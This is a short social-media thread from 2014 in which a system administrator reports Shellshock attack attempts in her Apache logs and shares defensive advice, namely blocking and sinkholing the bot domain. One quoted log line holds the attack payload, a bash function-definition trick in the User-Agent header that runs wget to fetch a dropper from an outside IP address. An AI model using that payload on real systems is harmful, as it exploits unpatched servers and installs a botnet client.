Conversation:
Notices
-
kat (boneidol)'s status on Friday, 26-Sep-2014 11:38:13 EDT
kat
every man and his dog wants to get in on this #shellshock mess.
grep "}" /var/log/apache2/ssl_access.log
127.0.0.1 - - [26/Sep/2014:11:20:43 +0000] "GET /test HTTP/1.0" 404 5067 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wo… -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:42:33 EDT
kat
I'm running rsyslogd with some anonymity patches so you cannot see the IP address of the attacker. -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:43:03 EDT
kat
But she has leaked the IP address of the dropper script http://pastebin.com/jLjZqLwD -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:47:36 EDT
kat
Which is some ugly Perl IRC bot. They delete the script after running it. -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:48:16 EDT
kat
So, it won't survive a reboot, if it's not dropped something worse on your system before that. -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:49:03 EDT
kat
Hides the running process as nagios nrpe -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:50:15 EDT
kat
block fbi.bot.nu on your firewalls -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:54:41 EDT
kat
I'm going to set my (and any clients I can help) DNS servers to be authoritative for that domain and return localhost for anything in it
-